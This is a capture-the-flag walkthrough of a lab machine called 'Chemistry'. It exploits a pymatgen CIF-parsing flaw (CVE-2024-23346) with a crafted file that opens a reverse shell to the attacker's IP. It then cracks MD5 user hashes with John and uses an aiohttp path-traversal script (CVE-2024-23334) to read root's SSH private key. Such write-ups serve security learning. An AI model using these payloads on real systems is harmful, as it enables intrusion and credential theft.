Recon
Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_ 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.3 Python/3.9.5
| Date: Sun, 20 Oct 2024 08:04:45 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 719
| Vary: Cookie
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Chemistry - Home</title>
| <link rel="stylesheet" href="/static/styles.css">
| </head>
| <body>
| <div class="container">
| class="title">Chemistry CIF Analyzer</h1>
| <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
| <div class="buttons">
| <center><a href="/login" class="btn">Login</a>
| href="/register" class="btn">Register</a></center>
| </div>
| </div>
| </body>
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
Werkzeug Web Server (Port 5000):
- The Python-based web server suggests a custom or lightweight web application, in this case, a "Chemistry CIF Analyzer."
- Potential vectors include analyzing how it handles file uploads (CIF file).
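The version strings in the Server header are worth recording, since they guide the later search for known vulnerabilities. A minimal sketch of splitting such a header into product and version pairs follows; the helper name parse_server_header is made up for illustration.

```python
def parse_server_header(value: str) -> dict[str, str]:
    """Split a Server header such as 'Werkzeug/3.0.3 Python/3.9.5' into product -> version."""
    products = {}
    for token in value.split():
        # Each token looks like "Name/Version"; a token without "/" gets an empty version.
        name, _, version = token.partition("/")
        products[name] = version
    return products


banner = parse_server_header("Werkzeug/3.0.3 Python/3.9.5")
print(banner)
```

The same helper works for any header of this shape.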
Port 5000 | CIF

A CIF (Crystallographic Information File) is a standard text file format used in crystallography to store and exchange crystallographic data. This format organizes information primarily about crystal structures such as atomic coordinates, cell dimensions, symmetry operations, and other details related to the material's three-dimensional atomic arrangement.
- Structure: CIF files are structured in a way that they can be easily read both by humans and machines. The format is tag-based, similar to XML or JSON, with specific data items identified by unique tags.
- Data Types: They can include a wide range of data, from chemical composition and crystal symmetry to detailed atomic coordinates and temperature factors.
- Extensibility: The format is extensible, allowing for the inclusion of new data items as crystallography evolves.
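To make the tag-based layout concrete, here is a rough sketch of a reader for the simplest CIF constructs: a data_ block name, single tag/value pairs, and one loop_ table. It is an illustrative toy, not a full CIF parser. The function name parse_simple_cif and the sample text are assumptions made for this example.

```python
import shlex

SAMPLE_CIF = """\
data_Example
_cell_length_a 10.00000
_cell_angle_alpha 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
"""


def parse_simple_cif(text):
    """Return (block_name, items, rows) for a CIF with at most one loop_ table."""
    block_name, items, loop_tags, rows = None, {}, [], []
    in_loop = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        if line.startswith("data_"):
            block_name = line[len("data_"):]
            continue
        if line == "loop_":
            in_loop = True
            continue
        tokens = shlex.split(line)  # honours quoted values such as 'P 1'
        if tokens[0].startswith("_"):
            if in_loop and len(tokens) == 1:
                loop_tags.append(tokens[0])  # column header of the loop
            else:
                items[tokens[0]] = " ".join(tokens[1:])
                in_loop = False
        elif in_loop:
            rows.append(dict(zip(loop_tags, tokens)))  # one data row of the loop
    return block_name, items, rows


name, items, rows = parse_simple_cif(SAMPLE_CIF)
print(name, items["_symmetry_space_group_name_H-M"], [r["_atom_site_label"] for r in rows])
```

Real CIF files also use multi-line values and several loops, which this sketch deliberately ignores.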
The process might seem a bit intricate, but let's perform a test first. Head over to the Crystallography Open Database and select a CIF file for download. Once we've got the file, create a new account on the server, then upload it. This will allow us to test how the server handles CIF uploads, potentially revealing critical insights into its processing flow:

Upon uploading the CIF file, the server returns a 404 error, but interestingly, it reveals the path /structure for handling uploaded files:

Additionally, the website offers a sample CIF file at address http://chemistry.htb:5000/static/example.cif:
data_Example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
Which can be successfully parsed by the server:

The web server itself is running Werkzeug 3.0.3 on Python 3.9.5. Python 3.9.5 is an old patch release, which hints that the libraries behind the application may be outdated as well. The most promising attack surface is therefore the way the server parses and handles CIF files:

Deserialization | Web
CVE-2024-23346
Based on the information gathered during reconnaissance, we know that the server parses CIF data under the /structure path and runs on the old Python 3.9.5, so it may also rely on obsolete and vulnerable libraries.
When we uploaded the example CIF and the server parsed it successfully, we could observe the following:
- The lattice parameters and atomic site data (positions of atoms in the above crystal structure) resemble the kind of structured output that pymatgen could generate from a CIF file. If the file upload parses these parameters from a CIF file and presents them in this format, it suggests that a crystallographic library like pymatgen is being used. pymatgen would extract lattice parameters (a, b, c, α, β, γ), atomic coordinates (x, y, z), and chemical formula (H1 O1), just as shown in the response.
- The atomic sites (positions x, y, z for each atom) are listed for the atoms labeled H and O. This is exactly the kind of output that pymatgen produces after parsing a CIF file. It extracts these details and allows for easy presentation in web applications.
The web server is running Werkzeug 3.0.3 on Python 3.9.5, which is a suitable setup for leveraging pymatgen, a powerful Python library for parsing CIF files. However, an outdated pymatgen installation would introduce real risk.
Specifically, CVE-2024-23346 could be relevant here. It affects pymatgen itself rather than the Python web server: in affected releases, the JonesFaithfulTransformation.from_transformation_str() method passes part of the parsed input to eval(), so a crafted CIF file can execute arbitrary code while it is being parsed. This article introduces Arbitrary Code Execution in Pymatgen via Insecure Deserialization.
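The CVE description attributes the issue to eval() being applied to a transformation string. The sketch below is a simplified imitation of that pattern, not pymatgen's actual code. The function parse_basis_change and its variable values are hypothetical. It shows why emptying __builtins__ does not make eval() safe: attribute access on any literal still reaches every loaded class. The probe here only looks a class up and executes nothing.

```python
def parse_basis_change(transformation: str):
    """Hypothetical eval-based parser for strings shaped like 'a,b,c;0,0,0'."""
    basis_part, _origin_part = transformation.split(";")
    scope = {"a": 1.0, "b": 2.0, "c": 3.0}  # stand-in values for the lattice vectors
    # Builtins are disabled, yet attribute access on literals such as () still works.
    return [eval(term, {"__builtins__": None}, scope) for term in basis_part.split(",")]


benign = parse_basis_change("a,b,c;0,0,0")

# Harmless probe: walk from a tuple to `object`, list its subclasses, pick one by name.
probe = (
    'a,b,[d for d in ().__class__.__mro__[1].__subclasses__() '
    'if d.__name__ == "BuiltinImporter"][0];0,0,0'
)
leaked = parse_basis_change(probe)[2]

print(benign)
print(leaked.__name__)
```

Because this sketch splits on ";" and "," before evaluating, the probe has to avoid both characters inside its expression. Once a class like BuiltinImporter is reachable, an attacker can import modules without any builtins.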
Pymatgen
The CIF (Crystallographic Information File) format is highly relevant when working with pymatgen (Python Materials Genomics), a robust library in Python used for materials analysis.
Integration of CIF files with pymatgen:
- Structure Loading and Manipulation: pymatgen can read CIF files to load crystallographic structures into Python objects. It allows researchers and developers to manipulate these structures programmatically.
- Materials Property Calculation: Once the structure is loaded from a CIF file, pymatgen can be used to calculate a wide range of materials properties, such as electronic band structure, density of states, and dynamic stability.
- Materials Analysis: pymatgen includes modules for analyzing crystal symmetry, exploring phase diagrams, and generating Pourbaix diagrams.
- Visualization: Through integration with visualization libraries, pymatgen can be used to generate visual representations of the structures loaded from CIF files. This helps build a more intuitive understanding of complex crystal structures.
- Automation in Materials Discovery: pymatgen plays a crucial role in high-throughput materials discovery workflows. It can automate the generation of inputs for simulations, manage computational jobs, and analyze outputs.
To better understand how the server operates, let's look at an example that shows how it likely uses the pymatgen library:
from pymatgen.io.cif import CifParser
# Load a CIF file
parser = CifParser("<path>/<CIF>")
structure = parser.get_structures()[0]
# Print the structure summary
print(structure)
# Calculate and print the space group
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
space_group_analyzer = SpacegroupAnalyzer(structure)
print("Space group:", space_group_analyzer.get_space_group_symbol())
This script loads a crystal structure from a CIF file, extracts key details, and identifies its space group using pymatgen's built-in functionality, which is presumably close to what the server does.
To reproduce the proof of concept (PoC) locally, install a vulnerable pymatgen release, that is, 2024.2.8 or earlier. This lets us explore possible weaknesses in the system further:

To test the Python script with real-world data, we can replace the file path and CIF file name to reflect the actual file we downloaded from the web app:

It extracts and displays the crystal structure details, allowing us to validate the behavior of the server when it parses the CIF file.
Exploit
Original POC from the CVE:
data_5yOhtAoR
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch pwned");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
Our target server will return a 404 error, similar to what we observed when uploading a random CIF file earlier. This happens because the data structure is NOT recognized by the pymatgen library on the backend.
To bypass this, we need to provide a valid crystallographic data structure and embed our malicious payload within it. Since the CIF format is extensible, we can modify the example.cif file to include a reverse shell payload:
# example.cif
data_Example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
# payload
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.▒▒.▒▒/4444 0>&1\'");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
It no longer returns 404, but 500 (Internal Server Error). With a listener set up in advance on port 4444, we catch a reverse shell as the app account:

Crack Hash | Rosa
Our next target will be user rosa:

The application directory often reveals sensitive information, such as configuration or database files. In this case, under the path /home/app/instance/, we find a database.db file:

Download the file to our attack machine and dump it to obtain the password hashes of all registered users:

And we know these are MD5 hashes:

We can use John to crack them easily. Save the hashes into a TXT file:
admin:2861debaf8d99436a10e▒▒▒▒▒▒▒▒▒▒▒▒
app:197865e46b878d9e74a0▒▒▒▒▒▒▒▒▒▒▒▒
rosa:63ed86ee9f624c7b14f1▒▒▒▒▒▒▒▒▒▒▒▒
robert:02fcf7cfc10adc37959▒▒▒▒▒▒▒▒▒▒▒▒
jobert:3dec299e06f7ed187b▒▒▒▒▒▒▒▒▒▒▒▒
carlos:9ad48828b0955513f7▒▒▒▒▒▒▒▒▒▒▒▒
peter:6845c17d298d95aa942▒▒▒▒▒▒▒▒▒▒▒▒
victoria:c3601ad2286a4293868▒▒▒▒▒▒▒▒▒▒▒▒
tania:a4aa55e816205dc0389591▒▒▒▒▒▒▒▒▒▒▒▒
eusebio:6cad48078d0241cca9a7b3▒▒▒▒▒▒▒▒▒▒▒▒
gelacia:4af70c80b68267012ecd▒▒▒▒▒▒▒▒▒▒▒▒
fabian:4e5d71f53fdd2eabdba▒▒▒▒▒▒▒▒▒▒▒▒
axel:9347f9724ca083b17e395▒▒▒▒▒▒▒▒▒▒▒▒
kristel:6896ba7b11a62cacf▒▒▒▒▒▒▒▒▒▒▒▒
Then run John:
john hashes.txt --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt
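Conceptually, a raw-md5 wordlist attack hashes every candidate word and compares the digest with the stored values. A minimal sketch of that idea follows. The user names, passwords and tiny wordlist are made up, and John itself is far faster and supports mangling rules.

```python
import hashlib


def crack_md5(hashes, wordlist):
    """Map user -> plaintext for every unsalted MD5 hash whose password is in the wordlist."""
    by_digest = {}
    for user, digest in hashes.items():
        by_digest.setdefault(digest.lower(), []).append(user)
    cracked = {}
    for word in wordlist:
        digest = hashlib.md5(word.encode("utf-8")).hexdigest()
        for user in by_digest.get(digest, []):
            cracked[user] = word
    return cracked


# Hypothetical demo data: one password is in the list, the other is not.
demo_hashes = {
    "alice": hashlib.md5(b"sunshine").hexdigest(),
    "bob": hashlib.md5(b"not-in-the-list").hexdigest(),
}
demo_words = ["123456", "password", "sunshine"]

cracked = crack_md5(demo_hashes, demo_words)
print(cracked)
```

When feeding it rockyou.txt, the file is usually opened with encoding="latin-1" because it contains bytes that are not valid UTF-8.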
Running John against the hashes cracks the plain-text password for our target user rosa:

Reusing the password for SSH login, we compromise the rosa account and take the user flag:

Aiohttp | Root
Enumerating the machine with LinPEAS, we can take a look at the current processes:

And the listening ports reported by netstat:

The target is straightforward: a suspicious service is listening on local port 8080. Set up port forwarding and check the service.
ssh -L 1337:127.0.0.1:8080 rosa@chemistry.htb
Once tunneled, visit the port in our browser to find a monitoring service:

Observe the network traffic in BurpSuite:

The response header Server: Python/3.9 aiohttp/3.9.1 indicates that the service is built using aiohttp, a Python asynchronous framework commonly used for building web applications and APIs.
aiohttp is a popular asynchronous HTTP client-server framework in Python that is designed to handle asynchronous requests efficiently, making it suitable for building scalable web applications, APIs, and services that require high concurrency. It is often used to create non-blocking, event-driven applications where tasks such as network communication, database queries, or file operations can be handled concurrently without waiting for each task to finish before starting the next.
As with the pymatgen exploit, we are dealing with an outdated Python component: aiohttp 3.9.1 is subject to CVE-2024-23334, and a PoC can be found on GitHub.
CVE-2024-23334 is a directory traversal vulnerability in versions of the aiohttp library up to 3.9.1. The vulnerability occurs when aiohttp is used to serve static files and the follow_symlinks option is set to True. This configuration allows attackers to bypass the static root directory and access arbitrary files on the server's filesystem, potentially exposing sensitive information.
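The root cause of such a traversal bug can be modeled without aiohttp: the requested path is joined to the static root, and nothing checks that the result still lies inside it. The sketch below is a simplified model under that assumption, not aiohttp's actual implementation. STATIC_ROOT and both function names are hypothetical.

```python
import posixpath

STATIC_ROOT = "/srv/app/assets"  # hypothetical static directory


def resolve_unchecked(request_path):
    """Join and normalise the path without verifying it stays under STATIC_ROOT."""
    return posixpath.normpath(posixpath.join(STATIC_ROOT, request_path))


def resolve_checked(request_path):
    """Same resolution, but refuse anything that escapes STATIC_ROOT."""
    candidate = resolve_unchecked(request_path)
    if posixpath.commonpath([STATIC_ROOT, candidate]) != STATIC_ROOT:
        return None
    return candidate


escaped = resolve_unchecked("../../../etc/passwd")
blocked = resolve_checked("../../../etc/passwd")
allowed = resolve_checked("css/site.css")
print(escaped, blocked, allowed)
```

Surplus ../ segments are harmless because normalisation stops at the filesystem root, which is why an exploit can simply keep adding them until the request succeeds.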
The PoC on GitHub is purely for demonstration, so we don't need to set up its server on our attack machine; the target server already plays that role. Let's take a look at the exploit.sh script:
#!/bin/bash
url="http://localhost:8081"
string="../"
payload="/static/"
file="etc/passwd" # without the first /
for ((i=0; i<15; i++)); do
    payload+="$string"
    echo "[+] Testing with $payload$file"
    status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
    echo -e "\tStatus code --> $status_code"
    if [[ $status_code -eq 200 ]]; then
        curl -s --path-as-is "$url$payload$file"
        break
    fi
done
- payload="/static/": This is the starting point for the payload, indicating the script begins the traversal at the /static/ directory, which is often used to serve static content.
- file="etc/passwd": This is the target file for leaking.
- The loop attempts up to 15 levels of directory traversal (adding ../ to the payload each time) to move up in the file structure from the /static/ directory.
- curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file": This command makes an HTTP request to the server using the curl tool. The --path-as-is option tells curl to send the path exactly as written; without it, curl would collapse the ../ sequences before sending the request.
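The same loop can be sketched in Python. http.client is used here on the assumption that it writes the request path exactly as given, much like curl with --path-as-is. The function names are illustrative and not part of the PoC. Only the path generator runs in this snippet; fetch_raw and first_hit need a reachable server.

```python
import http.client


def traversal_paths(prefix, target, max_depth=15):
    """Yield prefix + '../' * n + target for n = 1..max_depth, like the shell loop."""
    for depth in range(1, max_depth + 1):
        yield prefix + "../" * depth + target


def fetch_raw(host, port, path, timeout=5.0):
    """Send a GET request for the given path and return (status, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path)
        response = conn.getresponse()
        return response.status, response.read()
    finally:
        conn.close()


def first_hit(host, port, prefix, target, max_depth=15):
    """Return (path, body) for the first candidate answered with 200, else None."""
    for path in traversal_paths(prefix, target, max_depth):
        status, body = fetch_raw(host, port, path)
        if status == 200:
            return path, body
    return None


candidates = list(traversal_paths("/static/", "etc/passwd", max_depth=3))
print(candidates)
```

A call such as first_hit("localhost", 8081, "/static/", "etc/passwd") would mirror the original script's defaults.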
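In our attack scenario, the service listens on port 8080 on the target, and our target file could be something like /root/.ssh/id_rsa. The static directory /assets was revealed through network traffic analysis. Now, we can proceed by modifying the exploit.sh script. Note that the URL below works when the script runs on the target itself; when running it from the attack machine through the SSH tunnel, point url at http://localhost:1337 instead: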
#!/bin/bash
url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/.ssh/id_rsa" # without the leading /
for ((i=0; i<15; i++)); do
    payload+="$string"
    echo "[+] Testing with $payload$file"
    status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
    echo -e "\tStatus code --> $status_code"
    if [[ $status_code -eq 200 ]]; then
        echo "[+] File found, downloading contents..."
        curl -s --path-as-is "$url$payload$file"
        break
    fi
done
Bingo:

Use the private key to log in over SSH as the root user:

Rooted.